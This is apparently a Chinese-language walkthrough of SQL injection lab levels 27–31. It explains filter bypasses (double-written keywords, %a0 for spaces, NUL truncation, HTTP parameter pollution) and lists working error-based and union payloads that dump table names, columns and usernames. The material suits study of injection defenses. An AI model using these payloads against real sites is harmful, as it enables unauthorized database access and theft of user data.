27.
过滤了 union 和 select，使用双写绕过：过滤器是把关键字从输入中删除而不是拒绝请求，删除后剩余字符重新拼出关键字。从 payload 看，union 只需双写一层（ununionion），而 select 需要嵌套两层（seselselectectlect），说明 select 被删除了两次，嵌套层数必须与删除次数一致。另外 payload 全程不使用空格而用括号分隔各子句，推测空格同样被过滤。
页面会回显 MySQL 报错信息，因此用报错注入：extractvalue()/updatexml() 的第二个参数前拼上 0x5c（\）或 0x7e（~），使 XPath 表达式非法，MySQL 会把该字符串原样放进错误信息中回显。
1'and(extractvalue(1,concat(0x5c,database())))and'1'='1
1'and(updatexml(1,concat(0x7e,database(),0x7e),1))and'1'='1
1'and(extractvalue(1,concat(0x5c,(selseselectlectect(group_concat(table_name))from(information_schema.tables)where(table_schema='security')))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),0x7e),1))and'1'='1
1'and(extractvalue(1,concat(0x5c,(seselselectectlect(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users')))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users')),0x7e),1))and'1'='1
1'and(extractvalue(1,concat(0x5c,(seselselectectlect(group_concat(username))from(security.users)))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(username))from(security.users)),0x7e),1))and'1'='1
这里一次显示不了所有数据：XPath 报错信息只回显约 32 个字符，group_concat 的结果会被截断。可以用 limit 逐行取，或用 substr() 分段取同一个长值。
27a.
27a：没有报错信息了，只能改用联合查询靠页面回显取数据。payload 里用 %a0（0xA0 字节）代替被过滤的空格，MySQL 在常见连接字符集下会把它当作分隔符处理，具体是否可用需实测。
用单引号 ' 无法闭合，改用双引号 " 后发现可以闭合，说明 id 在 SQL 中是用双引号包裹的。
0"ununionion%a0seselselectectlect%a01,2,3%a0and"1"="1
0"ununionion%a0seselselectectlect%a01,database(),3%a0and"1"="1
0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema='security'),3%a0and"1"="1
0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'),3%a0and"1"="1
0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(username)%a0from%a0security.users),3%a0and"1"="1
28.
不会返回报错信息，无法使用报错注入，改用联合查询。payload 里 union 与 select 之间以及其余位置都用 %a0 代替空格，推测普通空格被过滤；结尾用 ;%00 截断后面的语句，%00 是 NUL 字节，在这里代替被过滤的注释符（--、#），是否生效取决于后端如何处理字符串中的 NUL，需实测。
1')union%a0select%a01,2,3;%00
0')union%a0select%a01,database(),3;%00
0')union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema='security'),3;%00
0')union%a0select%a01,(select%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'),3;%00
0')union%a0select%a01,(select%a0group_concat(username)%a0from%a0security.users),3;%00
28a. 与 28 相比只需在 union 与 select 之间用 %a0，其余位置普通空格即可，说明过滤的是 union 紧跟空白再跟 select 这一组合（疑似 /union\s+select/i），不再单独过滤空格。
0')union%a0select 1,2,3;%00
0')union%a0select 1,database(),3;%00
0')union%a0select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3;%00
0')union%a0select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3;%00
0')union%a0select 1,(select group_concat(username) from security.users),3;%00
29.
题目提示会检测 id 参数是否为数字。这是 HTTP 参数污染（HPP）：前置的检查只读取第一个同名参数，而后端拼 SQL 时取的是最后一个同名参数，两层对重复参数的解析不一致。
因此传递两个 id：第一个给合法数字（如 id=1）通过检查，第二个放注入 payload，最终进入 SQL 的是后者。
&id=0'union select 1,database(),3 --+
&id=0'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
&id=0'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+
&id=0'union select 1,(select group_concat(username) from security.users),3 --+
30.
与 29 相同，只是闭合符由单引号换成双引号（id 在 SQL 中用 " 包裹），仍通过重复 id 参数绕过数字检查。
&id=0"union select 1,2,3 --+
&id=0"union select 1,database(),3 --+
&id=0"union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
&id=0"union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+
&id=0"union select 1,(select group_concat(username) from security.users),3 --+
31.
&id=0")union select 1,2,3 --+
比 30 多了一个括号：闭合方式为 ")，即 id 在 SQL 中被 ("...") 包裹。
&id=0")union select 1,database(),3--+
&id=0")union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
&id=0")union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+
&id=0")union select 1,(select group_concat(username) from security.users),3--+